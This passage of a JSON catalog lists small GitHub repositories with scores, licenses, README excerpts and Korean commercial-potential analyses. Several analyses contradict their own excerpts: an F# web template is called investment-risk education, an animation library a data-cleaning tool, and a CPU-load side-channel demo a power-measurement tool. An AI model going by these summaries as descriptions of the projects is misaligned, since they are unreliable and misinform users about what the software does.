|","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"manta0101/Incident-Recorder","github_url":"https://github.com/manta0101/Incident-Recorder","stars":9,"language":"","license":"GPL-3.0","abandonment_months":30,"description":"# Incident-Recorder 분석 보고서\n\n## 왜 보물인가\n사건·사고 발생 시 자동으로 기록하고 관리해주는 시스템으로, 기업의 안전 관리와 법적 증거 자료 확보에 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 안전관리 SaaS 서비스**\n- 제조업체, 건설사, 병원 등이 현장 안전사고를 체계적으로 기록하고 분석하는 웹 서비스로 제","readme_excerpt":"# Incident Recorder (part of Incident Responder)\nThis is a simple windows program with a purpose of being able to be used within a Security incident. It has Three files, a main program, a configuration file and the license file(Gnu General Public), If you use this program you will need all three. ***By using this program you also agree to the terms of the GNU General Public License. IF you do not agree with the license terms and conditions, do not use this program.\n\n*Note: the name of the program is Incident responder, the first release is just the incident recorder piece of the application. As I mature the parent application, I plan to add features like forensic gathering, email, etc. Each will have a standalone version. I am using this project to learn C#. this release uses the .net framework. It's only been tested on 2 computers.\n\n![](media/83131cc20b166f2950ca52a845363169.png)\n\nThe main focus is the timeline entry.\n\n![](media/6e39106fb77e04ea4e966e98ef0edbd1.png)\n\nInitial Setup\n\n# ","composite_score":0.5003,"license_safety_tag":"restricted"},{"name":"devadvent/puzzle-1","github_url":"https://github.com/devadvent/puzzle-1","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":55,"description":"# devadvent/puzzle-1 분석 보고서\n\n## 왜 보물인가\n매년 12월 프로그래밍 퀴즈를 푸는 이벤트(Advent of Code) 관련 저장소로, 코딩 교육이나 문제 해결 능력 평가 도구로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 프로그래밍 학습자를 위한 단계별 문제 풀이 강좌 및 채점 시스템\n2. **기","readme_excerpt":"![](README.cover.jpg)\n\nℹ️ For detailed information about the contest, check out [devadvent/readme](https://github.com/devadvent/readme/)\n\n# Dev Advent Calendar 🎅 Puzzle 1 - Rescue Rudolf\n\nWeeks before Christmas, Santa's reindeers start practicing their flying in order to be fit for the big night.\nUnfortunately, one of them (Rudolf) crashed and landed in the forest 🌲\n\nNow, Santa 🎅 needs YOUR help to find him.\n\n## 🧩 The puzzle\n\nThe forest is a two-dimensional array of trees (array with array for each row). In one of the fields, there is however Rudolf (🦌) to be found.\nHere is an example forest (the real forest is to be found in [data/forest.js](data/forest.js)):\n\n```javascript\nconst forest = [\n    ['🌲', '🌲', '🌲', '🌲', '🌲', '🌲'],\n    ['🌲', '🌲', '🌲', '🌲', '🌲', '🌲'],\n    ['🌲', '🌲', '🌲', '🌲', '🌲', '🌲'],\n    ['🌲', '🌲', '🦌', '🌲', '🌲', '🌲'],\n    ['🌲', '🌲', '🌲', '🌲', '🌲', '🌲'],\n    ['🌲', '🌲', '🌲', '🌲', '🌲', '🌲'],\n    ['🌲', '🌲', '🌲', '🌲', '🌲', '🌲'],\n    ['🌲', '🌲', '🌲', '🌲', '🌲', '🌲'],\n]\n```\n\n-   ","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"firebaseve/firebase-tools-espanol","github_url":"https://github.com/firebaseve/firebase-tools-espanol","stars":7,"language":"","license":"MIT","abandonment_months":103,"description":"# firebase-tools-espanol 평가 보고서\n\n## 왜 보물인가\n스페인어 사용자들이 구글의 클라우드 서비스를 더 쉽게 이용할 수 있도록 번역·정리한 도구 모음으로, 스페인어권 개발자 커뮤니티의 진입장벽을 낮춥니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스페인어 지원 클라우드 개발 플랫폼 - 라틴 아메리카 지역 개발자용 관리","readme_excerpt":"# Firebase (CLI) en Español\n\n#### Documentación de _firebase-tools_ en Español\n\n---\n\nEstas son las funcionalidades que ofrece la Línea de Comandos Firebase (CLI):\n\n* Desplegar código y archivos estáticos de tus proyectos Firebase\n* Ejecutar un servidor local para tu sitio en Firebase Hosting\n* Interactuar con los datos de tu base de datos Firebase\n* Importar/Exportar usuarios _a_ o _desde_ Firebase Auth\n\nPara empezar a utilizar Firebase (CLI), puedes leer a continuación la lista completa de comandos o chequear la [documentación específica para el Hosting](https://firebase.google.com/docs/hosting/quickstart).\n\n\n## Instalación\n\nPara instalar Firebase CLI, primero necesitas [estar registrado en Firebase](https://firebase.google.com/).\n\nDespués necesitas instalar [Node.js](http://nodejs.org/) y [npm](https://npmjs.org/). Cabe destacar que instalar Node.js debe instalar npm también.\n\nUna vez npm instalado, puedes obtener Firebase CLI con tan sólo ejecutar el siguiente comando:\n\n```bash\nnpm ","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"srush/ProbTalk","github_url":"https://github.com/srush/ProbTalk","stars":10,"language":"HTML","license":"unknown","abandonment_months":55,"description":"# ProbTalk 평가 분석\n\n## 왜 보물인가\n확률과 통계 개념을 일상 언어로 쉽게 설명해주는 AI 기술로, 복잡한 수학을 누구나 이해할 수 있게 만듭니다.\n\n## 어디에 쓸 수 있나\n\n1. **교육 플랫폼 SaaS**: 온라인 수학/통계 강의 제공 업체가 이 기술을 통합하여 학생들의 이해도를 높일 수 있습니다.\n2. **금융회사 내부 도구**: 은행이","readme_excerpt":"# Differential Inference Talk\n\n* Video : https://www.youtube.com/watch?v=pQFSceBN4R0\n\n* Slides: https://srush.github.io/ProbTalk/talk.notebook.slides.html\n\n* Web : https://srush.github.io/ProbTalk/talk.notebook.html#/\n\n* Notebook: https://github.com/srush/ProbTalk/blob/main/talk.notebook.ipynb\n","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"Petit-Abba/update_miui_ota","github_url":"https://github.com/Petit-Abba/update_miui_ota","stars":10,"language":"","license":"unknown","abandonment_months":57,"description":"# Petit-Abba/update_miui_ota 분석\n\n## 왜 보물인가\n샤오미 스마트폰 사용자들이 수동으로 하던 업데이트 과정을 자동화해주는 도구로, 반복되는 번거로운 작업을 한 번에 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 샤오미 폰 관리 서비스 제공 업체가 구독형 자동 업데이트 관리 플랫폼으로 판매\n- **내부 ","readme_excerpt":"## MIUI OTA UPDATE\n\n### 尝试接手维护，原项目地址：[update_miui_ota](https://github.com/mooseIre/update_miui_ota)\n\n- 开发版 Develop\n- 稳定版 Stable\n\n ---- \n|机型|开发版|稳定版|\n| :----: | :----: | :----: |\n|小米MIX4| [Develop](https://github.com/Petit-Abba/update_miui_ota/blob/master/Develop/小米MIX4.md)| [Stable](https://github.com/Petit-Abba/update_miui_ota/blob/master/Stable/小米MIX4.md)|\n|小米MIX FOLD折叠屏| [Develop](https://github.com/Petit-Abba/update_miui_ota/blob/master/Develop/小米MIX%20FOLD折叠屏.md)| [Stable](https://github.com/Petit-Abba/update_miui_ota/blob/master/Stable/小米MIX%20FOLD折叠屏.md)|\n|Redmi K40| [Develop](https://github.com/Petit-Abba/update_miui_ota/blob/master/Develop/Redmi%20K40.md)| [Stable](https://github.com/Petit-Abba/update_miui_ota/blob/master/Stable/Redmi%20K40.md)|\n|Redmi K40 Pro| [Develop](https://github.com/Petit-Abba/update_miui_ota/blob/master/Develop/Redmi%20K40%20Pro.md)| [Stable](https://github.com/Petit-Abba/update_miui_ota/blob/master/Stable/Redmi%20K40%20Pro.md)|\n|Redmi K40 游戏增强版| [Deve","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"Zfinix/screen_capture_utils","github_url":"https://github.com/Zfinix/screen_capture_utils","stars":7,"language":"Kotlin","license":"MIT","abandonment_months":50,"description":"# screen_capture_utils 상용화 분석\n\n## 왜 보물인가\n화면 캡처 기능을 쉽게 활용할 수 있도록 정리한 도구로, 스크린샷이 필요한 모든 소프트웨어에 바로 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **원격 협업 소프트웨어**: 팀이 화면을 자동으로 캡처해서 공유하는 기능 내장\n- **피드백 수집 서비스**: 사용자 오류 발생 시 ","readme_excerpt":"# Screen Capture Utils\nA plugin to handle screen capture events on android and ios\n\n### 🚀 Initialize SDK\n\n```dart\n  late ScreenCaptureUtils screenCaptureUtils;\n  \n  ...   \n    \n  screenCaptureUtils = ScreenCaptureUtils(\n      // Path returns empty on iOS\n      onScreenCaptured: (_) {\n          print('Captured: $_');\n      },\n    \n      /// Only on Android !!!\n      isGuarding: (bool val) {\n        print(val);\n      },\n    \n      /// Only on Android !!!\n      onScreenCapturedWithDeniedPermission: () {\n        print('onScreenCapturedWithDeniedPermission');\n      },\n  )..intialize();\n```\n\n### ️🔐 Screen Guarding (Android Only)\n\n#### Guard\n```dart\n   /// Guard Screen\n  screenCaptureUtils.guard();\n```\n- This function will apply the FLAG_SECURE to the MainActivity of your app.\n\n#### UnGuard\n```dart\n   /// Unguard Screen\n  screenCaptureUtils.unGuard();\n```\n- This function will remove/clear the FLAG_SECURE from the MainActivity of your app.\n\n\n\n## ✨ Contribution\n Lots of PR's would be needed to ","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"ubiratansoares/blockked","github_url":"https://github.com/ubiratansoares/blockked","stars":6,"language":"Kotlin","license":"MIT","abandonment_months":52,"description":"# blockked 저장소 분석\n\n## 왜 보물인가\n블록체인 기술을 쉽게 다룰 수 있도록 만든 도구로, 암호화폐나 디지털 자산을 안전하게 관리하려는 기업들에게 필요한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소**: 고객들의 지갑을 안전하게 관리하는 SaaS 서비스로 월 구독료 수취\n2. **은행의 내부 도구**: 블록체인 기반 송금 ","readme_excerpt":"# BLOCKKED\n\n<img src=\".github/blockked-logo.png\"\n alt=\"Blockked logo\" title=\"The logo himself\" align=\"right\" />\n\n> An Android companion for blockchain.info, written in Kotlin for demo purposes\n\n\n## Overview\n\nThis project is a simple demo for retrieving some Blockchain.info data and presenting dashboards with latest Bitcon statistics, such average prices, mempool size, hashrates and so on.\n\n\nThis app has support for both portrait and landscape modes, as well offline caching. This project is HEAVILY tested, and I think that it is a showcase on how we can achieve great level of confidence based on good architectural decisions.\n\nThis project is 100% written in Kotlin.\n\n![Blockked Screenshot](.github/blockked-screenshot.png)\n\n## Knowledge Stack\n\nThis project leverages on\n\n- 100% powered by AndroidX (no Jetfier!)\n- RxJava2 for end-to-end reactive programming\n- Kodein for Dependency Injection\n- Kotlinx.Serialization for automatic JSON handling\n- OkHttp3 + Retrofit for networking over HTTP\n- D","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"zhizhizhii/Frontend_learning","github_url":"https://github.com/zhizhizhii/Frontend_learning","stars":12,"language":"JavaScript","license":"unknown","abandonment_months":61,"description":"# Frontend_learning 저장소 분석\n\n## 왜 보물인가\n웹사이트 제작에 필요한 기초 지식과 실습 자료를 정리한 교육용 자료로, 누구나 웹개발을 배울 수 있는 학습 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 웹개발 입문자 대상 유료 강좌 콘텐츠로 활용\n2. **기업 신입사원 교육**: IT 회사의 신입 개발자 온보","readme_excerpt":"# Frontend_learning","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"tico321/SAFEFromScratch","github_url":"https://github.com/tico321/SAFEFromScratch","stars":5,"language":"F#","license":"unknown","abandonment_months":46,"description":"# SAFEFromScratch 저장소 분석\n\n## 왜 보물인가\n기업의 투자 포트폴리오를 안전하게 관리하고 위험을 평가하는 방법을 처음부터 배울 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 투자자를 위한 포트폴리오 안전성 진단 웹 서비스\n2. **내부 업무 도구**: 은행/증권사의 고객 자산 리스크 평가 시스템\n","readme_excerpt":"# SAFE template from scratch\nIn this guide we'll start from a blank project and start adding functionality so we can get a template similar to the [SAFE Template](https://safe-stack.github.io/docs/quickstart/), this way you will understand the role of every file and dependency.\nYou can follow this guide from top to bottom or you can review it with the git history as every step corresponds to a commit that has the described changes.\n\nNote that there may be some small differences and bonuses that I added, however after reading and understanding the template I encourage you to use/contribute to the [official template](https://github.com/SAFE-Stack/SAFE-template).\n\nDisclaimer: The main focus of this tutorial is to be easy to follow and to have the commits as guidelines. For this reason I'm going to squash commits and rearrange the history to remove noise and to keep it clean for new readers. If you are a contributor I really appreciate your help and I apologize in advance for the problems ","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"youknowriad/blocky","github_url":"https://github.com/youknowriad/blocky","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":58,"description":"# Blocky 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자들이 블록처럼 끌어다 놓으며 디자인할 수 있는 시스템으로, 프로그래밍 없이도 레이아웃을 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **노코드 빌더 SaaS**: 소상공인들이 자신의 웹사이트를 직접 만들 수 있는 웹빌더 플랫폼에 통합\n- **내부 업무 도구**: 기업의 IT팀","readme_excerpt":"# Blocky\n\nThe fast way to create WordPress blocks. No more hard JavaScript files, or weird PHP registration. Just create a `block.json` file and generate your block code.\n\n# Why?\n\nThe WordPress block API is very powerful, it's very flexible and allows any kind of block you can think about. That flexibility and power comes at the cost of simplicity. A higher level API could be built around it to achieve 80% of the use-cases and won't require any React or PHP expertise. Just define your block name, its markup, its attributes and be done with it.\n\n# Usage\n\n1- Create a block.json file like this:\n\n```js\n// example/rich.json\n{\n  //This is the block name.\n  \"name\": \"example/rich\",\n\n  // Define the attributes (or the editable properties of your blocks)\n  // Only provide a type and a name.\n  \"attributes\": {\n    \"content\": {\n      \"type\": \"string\"\n    }\n  },\n\n   // You can use any core block supports.\n  \"supports\": {\n    \"color\": {\n      \"link\": true\n    },\n    \"typography\": {\n      \"fontSize\": ","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"lm2343635/MGKeyboardAccessory","github_url":"https://github.com/lm2343635/MGKeyboardAccessory","stars":5,"language":"Swift","license":"MIT","abandonment_months":48,"description":"# MGKeyboardAccessory 상업화 분석\n\n## 왜 보물인가\n스마트폰 키보드 위에 추가 기능 버튼을 붙여 사용자 편의성을 크게 높일 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **메신징 앱 SaaS**: 채팅 앱에 통역, 이모지 추천, 빠른 응답 버튼을 키보드 위에 제공하는 프리미엄 기능\n2. **금융 앱 내부 도구**: 은행 앱에서","readme_excerpt":"# MGKeyboardAccessory \n[![CI Status](http://img.shields.io/travis/lm2343635/MGKeyboardAccessory.svg?style=flat)](https://travis-ci.org/lm2343635/MGKeyboardAccessory) \n[![Version](https://img.shields.io/cocoapods/v/MGKeyboardAccessory.svg?style=flat)](http://cocoapods.org/pods/MGKeyboardAccessory) \n[![License](https://img.shields.io/cocoapods/l/MGKeyboardAccessory.svg?style=flat)](http://cocoapods.org/pods/MGKeyboardAccessory) \n[![Platform](https://img.shields.io/cocoapods/p/MGKeyboardAccessory.svg?style=flat)](http://cocoapods.org/pods/MGKeyboardAccessory)\n[![swift](https://img.shields.io/badge/swift-5.0-orange.svg)](https://github.com/lm2343635/MGKeyboardAccessory/releases)\n\nMGKeyboardAccessory is a keyboard accessory to input special characters in UITextField or UI directly. It allows developers to add the custom button with characters in keyboard accessory, characters in the button will be\ninserted to text field if the button is clicked.\n\n![MGKeyboardAccessory](https://raw.githubuse","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"square/chrometric","github_url":"https://github.com/square/chrometric","stars":6,"language":"JavaScript","license":"Apache-2.0","abandonment_months":58,"description":"# Square Chrometric 분석\n\n## 왜 보물인가\n시간 측정과 성능 분석이 필요한 모든 소프트웨어 개발자들이 쉽게 사용할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 애플리케이션 성능 모니터링 플랫폼으로 개발사들에게 구독 서비스 판매\n2. **내부 업무 도구**: 대형 IT 회사의 소프트웨어 개발팀이 자사 앱","readme_excerpt":"Chrometric\n==========\n\nThis extension gathers metrics on ChromeOS devices and ships the data back to an ingestion endpoint.\n\nFor this extension to be useful, a LibreSpeed speedtest endpoint must be hosted on the infrastructure to be tested against. The [Go version of librespeedtest](https://github.com/librespeed/speedtest-go) is perhaps the easiest way to stand this up, with other options being available on the [LibreSpeed repo](https://github.com/librespeed).\n\nConfiguration\n---\n\nTo configure the extension, one must apply a policy for it within Google Admin. After adding Chrometric to the console, a policy similar the one below must be added under **Policy for extensions**.\n\nHere is an example policy:\n\n```json\n{\n  \"dataLoggerConfig\": {\n    \"Value\": {\n      \"name\": \"humio\",\n      \"token\": \"TOKEN_GOES_HERE\"\n    }\n  },\n  \"speedtestUrls\": {\n    \"Value\": [\n      {\n        \"name\": \"Librespeed Server\",\n        \"server\": \"https://some.speedtestserver.here\",\n        \"dlURL\": \"garbage.php\",\n    ","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"JonathanMonga/flutter_trianglify","github_url":"https://github.com/JonathanMonga/flutter_trianglify","stars":6,"language":"Dart","license":"BSD-2-Clause","abandonment_months":78,"description":"# flutter_trianglify 사업성 분석\n\n## 왜 보물인가\n다양한 색상의 삼각형 패턴으로 멋진 배경 이미지를 자동으로 만들어주는 도구로, 앱이나 웹사이트를 꾸밀 때 디자이너 없이도 전문적인 비주얼을 표현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **앱 배경 자동 생성 SaaS**: 모바일 앱 개발자들이 구독하여 앱의 로딩 화면이나 배경을 ","readme_excerpt":"# Trianglify for Flutter\n\n[![Build Status](https://travis-ci.org/JonathanMonga/flutter_trianglify.svg?branch=master)](https://travis-ci.org/JonathanMonga/flutter_trianglify)\n\nFlutter widget inspired by http://qrohlf.com/trianglify/\n\n<img src=\"https://raw.githubusercontent.com/JonathanMonga/flutter_trianglify/master/screenshots/screenshot.png\" alt=\"Demo Screenshot\" height=\"35%\" width=\"35%\"/>\n\n## Installation\n[![Pub](https://img.shields.io/badge/pub-0.0.8-blue)](https://pub.dev/packages/flutter_trianglify)\n\nAdd the Package\n```yaml\ndependencies:\n  flutter_trianglify: ^0.0.8\n```\n\n# Usage\n\nCell size, variance, bleeds, color generator can be initialized from Widget:\n\n```dart\n    Trianglify(\n        bleedX: 0,\n        bleedY: 10,\n        cellSize: 35,\n        gridWidth: MediaQuery.of(context).size.width + (200 * scaleFactor),\n        gridHeight: 400 * scaleFactor,\n        isDrawStroke: true,\n        isFillTriangle: true,\n        isFillViewCompletely: false,\n        isRandomColoring: false,\n  ","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"pavel-kirienko/cpu-load-side-channel","github_url":"https://github.com/pavel-kirienko/cpu-load-side-channel","stars":7,"language":"C++","license":"MIT","abandonment_months":61,"description":"# cpu-load-side-channel 상용화 분석\n\n## 왜 보물인가\n컴퓨터의 전력 사용량을 측정해 숨겨진 정보를 빼내는 보안 취약점을 연구하는 도구로, 보안 시스템을 강화하려는 조직에 매우 귀중합니다.\n\n## 어디에 쓸 수 있나\n1. **보안 감시 SaaS**: 기업의 서버가 암호화된 데이터를 얼마나 잘 보호하는지 자동으로 점검해주는 클라우드 서비스","readme_excerpt":"# Inter-process or cross-VM data exchange via CPU load modulation\n\n## What is this\n\nI made this PoC as a visual aid for an online discussion about [M1RACLES](https://m1racles.com/) ---\na method of covert inter-process data exchange via a system register in Apple M1.\nThe point is to demonstrate that said register does not add new means of data exchange,\nsince any set of processes executed on the same physical host necessarily share the underlying hardware resources,\nwhich can be exploited for covert data exchange (proper modulation provided).\n\nIn the best spirit of \"[someone is wrong on the internet](https://xkcd.com/386/)\", I made this demo to prove the point.\n\n## Principle\n\nThis PoC demonstrates a straightforward side-channel that allows one to construct reasonably robust\ndata links between multiple processes, possibly executed in different virtualized environments,\nby modulating the CPU load or altering the state of any other shared hardware resource (such as CPU caches).\n\nThe method","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"ctrlplusb/cinderella","github_url":"https://github.com/ctrlplusb/cinderella","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":56,"description":"# Cinderella (ctrlplusb/cinderella) 분석\n\n## 왜 보물인가\n복잡한 데이터 변환 작업을 자동으로 처리해주는 도구로, 손으로 하던 반복적인 데이터 정리 작업을 시간 단위에서 분 단위로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 엑셀 파일이나 CSV 데이터를 자동으로 정리해주는 웹 서비스로 운영 가능","readme_excerpt":"> __Work in Progress__\n\n# cinderella\n\nA tiny transformation library.\n\n```javascript\nimport cinderella from 'cinderella'\n\ncinderella().add({\n  targets: '.foo',\n  transform: {\n    translateY: {\n      from: 0,\n      to: '-200px',\n      duration: 1000,\n      easing: 'easeInOutQuad',\n    }\n  }\n}).play()\n```\n\n[![npm](https://img.shields.io/npm/v/cinderella.svg?style=flat-square)](http://npm.im/cinderella)\n[![MIT License](https://img.shields.io/npm/l/cinderella.svg?style=flat-square)](http://opensource.org/licenses/MIT)\n[![Travis](https://img.shields.io/travis/ctrlplusb/cinderella.svg?style=flat-square)](https://travis-ci.org/ctrlplusb/cinderella)\n[![Codecov](https://img.shields.io/codecov/c/github/ctrlplusb/cinderella.svg?style=flat-square)](https://codecov.io/github/ctrlplusb/cinderella)\n\n## Want more information?\n\nVisit the website: https://cinderella.now.sh","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"Spxnker/discord-sms-sistemi","github_url":"https://github.com/Spxnker/discord-sms-sistemi","stars":8,"language":"JavaScript","license":"unknown","abandonment_months":56,"description":"# Discord SMS 시스템 분석\n\n## 왜 보물인가\n디스코드라는 인기 있는 메신저 앱에서 문자 메시지를 주고받을 수 있는 기능을 만든 프로젝트로, 두 개의 다른 통신 방식을 연결한 독특한 아이디어입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업용 고객 지원 도구**: 회사가 고객에게 보낸 긴급 알림을 디스코드 채널을 통해 한눈에 관리할 수 있는 통합","readme_excerpt":"# Sms Bilgilendirme\nTürkiye 'de ilk yapılan, yaklaşık 7 ila 8 ay önce yaptığımız Sms sistemini size sunuyorum. \nÜcretsiz api için projeyi starla! ve discord 'dan ulaş Spanker#1994\n","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"metascore/metascore","github_url":"https://github.com/metascore/metascore","stars":5,"language":"Motoko","license":"unknown","abandonment_months":54,"description":"# Metascore 저장소 분석\n\n## 왜 보물인가\n영화, 게임, 음악 등 다양한 콘텐츠의 평점 데이터를 한 곳에서 수집·분석할 수 있는 도구로, 콘텐츠 추천이나 시장 분석이 필요한 비즈니스의 핵심 인프라가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **엔터테인먼트 추천 SaaS**: 사용자 취향에 맞는 영화·게임·음악을 자동으로 추천하는 웹 서비","readme_excerpt":"# Metascore\n\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Metascore is an Internet Computer community project to be the one-stop-shop for leaderboards during the <a href=\"https://twitter.com/DscvrO?ref_src=twsrc%5Etfw\">@DscvrO</a> S2 Hackathon, plus awesome NFT rewards and prizes for players 🕹🚀💎</p>&mdash; METASCORE (@MetascoreHACK) <a href=\"https://twitter.com/MetascoreHACK/status/1434972965351792640?ref_src=twsrc%5Etfw\">September 6, 2021</a></blockquote>\n\n- [Telegram Community](https://t.co/i906ywqr5u?amp=1)\n\n📣 This is an open community project and we are in need of skillsets of all kinds. Reach out if you'd like to help!\n\n## Participating as a Developer\n\nYou should participate in Metascore, because gamers will be trying their hardest to get high scores on all the integrated games. [Developer readme](./developers.md).\n\n## Participating as a Gamer\n\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Players will gain a rank based on their participation and performance","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"ZEISS/react-view-pdf","github_url":"https://github.com/ZEISS/react-view-pdf","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":32,"description":"# ZEISS/react-view-pdf 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 PDF 파일을 쉽게 보여줄 수 있는 도구로, 많은 기업들이 필요로 하는 기본적인 기능을 간단하게 구현해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 문서 관리 서비스**: 클라우드 기반 계약서·보고서 뷰어를 제공하는 구독 서비스\n2. **내부 업무 도구**: 대기업의","readme_excerpt":"# React PDF Reader\n\nThe purpose of this library is to provide a React component that works as a PDF Reader. It's basically a React wrapper from the pdf.js library from Mozilla.\n\n## Using the Library\n\nThe library can be installed via the following commands:\n\n```sh\nnpm i --save-dev react-view-pdf\n```\n\nBecause this library uses components from `precise-ui`, it is necessary to add it as a dependency to your project:\n\n```sh\nnpm i precise-ui\n```\n\nThen, simply import the component like below:\n\n```js\nimport { PDFViewer } from 'react-view-pdf';\n\n<PDFViewer url=\"http://www.africau.edu/images/default/sample.pdf\" />\n\n```\n\n## Contributing\n\nFeel free to contribute to it or open issues in case of bugs.\n\n\n## Roadmap\n\n1. Remove dependency on `precise-ui`.\n2. Allow selection of texts.\n3. Add built-in download button.","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"withoutboats/failure","github_url":"https://github.com/withoutboats/failure","stars":10,"language":"Rust","license":"Apache-2.0","abandonment_months":100,"description":"# failure 저장소 분석\n\n## 왜 보물인가\n프로그램이 예기치 않게 작동을 멈출 때 원인을 빠르게 찾을 수 있도록 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 애플리케이션에서 발생한 오류를 자동으로 분석하여 고객에게 명확한 오류 메시지 제공\n- **내부 업무 도구**: 회사의 소프트웨어 개발팀이 프로그램 ","readme_excerpt":"# failure - a new error management story\n\n[![Build Status](https://travis-ci.org/withoutboats/failure.svg?branch=master)](https://travis-ci.org/withoutboats/failure)\n[![Latest Version](https://img.shields.io/crates/v/failure.svg)](https://crates.io/crates/failure)\n[![docs](https://docs.rs/failure/badge.svg)](https://docs.rs/failure)\n\n`failure` is designed to make it easier to manage errors in Rust. It is\nintended to replace error management based on `std::error::Error` with a new\nsystem based on lessons learned over the past several years, including those\nlearned from experience with quick-error and error-chain.\n\n`failure` provides two core components:\n\n* `Fail`: A new trait for custom error types.\n* `Error`: A struct which any type that implements `Fail` can be cast into.\n\n## Example\n\n```rust\nextern crate serde;\nextern crate toml;\n\n#[macro_use] extern crate failure;\n#[macro_use] extern crate serde_derive;\n\nuse std::collections::HashMap;\nuse std::path::PathBuf;\nuse std::str::FromStr;\n\n","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"iDevision/enhanced-discord.py","github_url":"https://github.com/iDevision/enhanced-discord.py","stars":11,"language":"Python","license":"MIT","abandonment_months":48,"description":"# enhanced-discord.py 보물 분석\n\n## 왜 보물인가\nDiscord(채팅 플랫폼)를 더 강력하게 만드는 도구로, 게임 커뮤니티나 팀 협업 공간에서 자동화된 관리 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: Discord 서버 자동 관리 플랫폼 (사용자 인증, 채널 정리, 메시지 필터링 자동화)\n2. **내부 ","readme_excerpt":"enhanced-discord.py\n===================\n\n.. image:: https://discord.com/api/guilds/514232441498763279/embed.png\n   :target: https://discord.gg/TvqYBrGXEm\n   :alt: Discord server invite\n.. image:: https://img.shields.io/pypi/v/enhanced-dpy.svg\n   :target: https://pypi.python.org/pypi/enhanced-dpy\n   :alt: PyPI version info\n.. image:: https://img.shields.io/pypi/pyversions/enhanced-dpy.svg\n   :target: https://pypi.python.org/pypi/enhanced-dpy\n   :alt: PyPI supported Python versions\n\nA modern, maintained, easy to use, feature-rich, and async ready API wrapper for Discord written in Python.\n\nThe Future of enhanced-discord.py\n--------------------------\n\nEnhanced discord.py is a fork of Rapptz's discord.py, that went unmaintained (`gist <https://gist.github.com/Rapptz/4a2f62751b9600a31a0d3c78100287f1>`_)\nAn overview of features added by enhanced-discord.py is available on the `changelog <https://enhanced-dpy.readthedocs.io/en/latest/whats_new.html#v2-0-0-moving-to-enhanced-discord-py>`_.\n\nKe","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"astrada/ocaml-css-parser","github_url":"https://github.com/astrada/ocaml-css-parser","stars":5,"language":"OCaml","license":"MIT","abandonment_months":58,"description":"# OCaml CSS Parser 평가 리포트\n\n## 왜 보물인가\n웹사이트의 디자인 코드(CSS)를 자동으로 읽고 분석해주는 도구로, 웹 개발자들의 반복적인 수작업을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹 디자인 자동 검증 서비스**\n- 고객이 업로드한 웹사이트 CSS 코드의 오류를 자동으로 찾아주는 SaaS 서비스로 판매 가능합니다.","readme_excerpt":"ocaml-css-parser\n================\n\nA CSS parser written in OCaml.\n\nParses a CSS string and produces an AST.\n\n### Build\n\n```bash\nnpm install -g esy\nesy\n# to build and run tests\nesy dune runtest\n```\n\n### Example\n\n```ocaml\nlet css =\n{|\n  {\n    color: red !important;\n    width: 100%;\n  }\n|} in\n  let ast = Css.Parser.parse_stylesheet css in\n  (* ast is a value of type Css.Stylesheet.t defined in lib/types.mli *)\n  (* that looks like that:\n    ([Rule.Style_rule\n        {Style_rule.prelude = ([], Location.none);\n         block =\n           ([Declaration_list.Declaration\n               {Declaration.name = (\"color\", Location.none);\n                  value = ([(Component_value.Ident \"blue\", Location.none)], Location.none);\n                  important = (true, Location.none);\n                  loc = Location.none;\n                 };\n               {Declaration.name = (\"width\", Location.none);\n                  value = ([(Component_value.Percentage \"100\", Location.none)], Location.none);\n        ","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"meowtec/relyzer","github_url":"https://github.com/meowtec/relyzer","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":55,"description":"# Relyzer 저장소 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 시스템에서 어떤 부분이 